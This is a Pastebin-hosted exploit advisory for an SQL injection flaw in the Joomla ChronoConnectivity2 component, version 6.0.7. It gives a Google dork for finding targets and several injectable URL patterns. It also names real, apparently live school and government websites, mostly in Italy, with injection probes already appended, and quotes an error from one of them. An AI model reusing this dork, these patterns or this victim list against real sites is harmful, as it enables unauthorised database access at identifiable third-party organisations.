KingSkrupellos

Joomla ChronoConnectivity2 Components 6.0.7 SQL Injection

Jan 31st, 2019
123
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.81 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla ChronoConnectivity2 Components 6.0.7 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 01/02/2019
  7. # Vendor Homepage : chronoengine.com
  8. # Software Download Link : chronoengine.com/chronoconnectivity/download
  9. # Software Information Link : extensions.joomla.org/extension/chrono-connectivity/
  10. # Software Version : 6.0.7
  11. # Other Affected Versions : V5.0.6_Component - V5.0_Plugin_RC1 - V4_RC3.2_J1.6
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Exploit Risk : Medium
  15. # Google Dorks : inurl:''/index.php?option=com_chronoconnectivity2''
  16. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  17. Special Elements used in an SQL Command ('SQL Injection') ]
  18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  21.  
  22. ####################################################################
  23.  
  24. # Description about Software :
  25. ***************************
  26. ChronoConnectivity is a raw CCK (Content constructions kit) for Joomla, it helps you
  27.  
  28. list and manage (delete/update) the data in any of your database tables, with
  29.  
  30. full permissions support, and full integration with Chronoforms.
  31.  
  32. Display and manage data from any MySQL database, build Joomla reports
  33.  
  34. and data tables easily and with huge list of features using ChronoConnectivity.
  35.  
  36. ####################################################################
  37.  
  38. # Impact :
  39. ***********
  40. Joomla ChronoConnectivity2 6.0.7 and other versions component for Joomla! is
  41.  
  42. prone to an SQL-injection vulnerability because it fails to sufficiently
  43.  
  44. sanitize user-supplied data before using it in an SQL query.
  45.  
  46. A successful exploit may allow an attacker to compromise the application, access
  47.  
  48. or modify data, or exploit latent vulnerabilities in the underlying database.
  49.  
  50. A remote attacker can send a specially crafted request to the vulnerable application
  51.  
  52. and execute arbitrary SQL commands in application`s database.
  53.  
  54. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  55.  
  56. An attacker can exploit this issue using a browser.
  57.  
  58. ####################################################################
  59.  
  60. # SQL Injection Exploit :
  61. **********************
  62.  
  63. /index.php?option=com_chronoconnectivity&Itemid=[SQL Injection]
  64.  
  65. /index.php?option=com_chronoconnectivity&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
  66.  
  67. /index.php?option=com_chronoconnectivity2&Itemid=[SQL Injection]
  68.  
  69. /index.php?option=com_chronoconnectivity2&connectionname=[FOLDER-NAME]&start=&Itemid=[SQL Injection]
  70.  
  71. /index.php?option=com_chronoconnectivity2&connectionname=albo_pretorio&start=&Itemid=[SQL Injection]
  72.  
  73. /index.php?option=com_chronoconnectivity2&connectionname=ricerca_archivio_accessibili&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
  74.  
  75. /index.php?option=com_chronoconnectivity2&connectionname=albo_storico_accessibili&cat=[ID-NUMBER]&Itemid=[SQL Injection]
  76.  
  77. /component/chronoconnectivity2/index.php?option=com_chronoconnectivity2&connectionname=albo_pretorio&start=&Itemid=[SQL Injection]
  78.  
  79. ####################################################################
  80.  
  81. # Example Vulnerable Sites :
  82. *************************
  83.  
  84. [+] iccapuana.gov.it/albopretorio/index.php?option=
  85. com_chronoconnectivity2&connectionname=albo_pretorio&start=&Itemid=1%27
  86.  
  87. [+] icdelpo.gov.it/home/index.php?option=com_chronoconnectivity2&Itemid=146%27
  88.  
  89. [+] issvigano.gov.it/joomla15/index.php?option=com_chronoconnectivity2&Itemid=60%27
  90.  
  91. [+] iisdefilippisprestia.gov.it/archivio/joomla15/index.php?option=
  92. com_chronoconnectivity2&connectionname=ricerca_archivio_accessibili&Itemid=5&limitstart=75%27
  93.  
  94. [+] ics-casalserugo.gov.it/joomla/albo/index.php?option=
  95. com_chronoconnectivity2&connectionname=albo_storico_accessibili&cat=3&Itemid=10%27
  96.  
  97. [+] ictravagliato.gov.it/15albo/index.php?option=
  98. com_chronoconnectivity2&connectionname=ricerca_archivio_accessibili&Itemid=5&start=&Itemid=5%27
  99.  
  100. [+] polobianciardigrosseto.it/portal/index.php?option=com_chronoconnectivity2&Itemid=309%27
  101.  
  102. [+] liad-alger.fr/joomla_eleves/index.php?option=com_chronoconnectivity&Itemid=32&limitstart=60%27
  103.  
  104. ####################################################################
  105.  
  106. # Example SQL Database Error :
  107. ****************************
  108.  
  109. Strict Standards: Non-static method JLoader::import()
  110. should not be called statically in /web/htdocs
  111. /www.iisdefilippisprestia.gov.it/home/archivio
  112. /joomla15/libraries/joomla/import.php on line 29
  113.  
  114. ####################################################################
  115.  
  116. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  117.  
  118. ####################################################################
Add Comment
Please, Sign In to add comment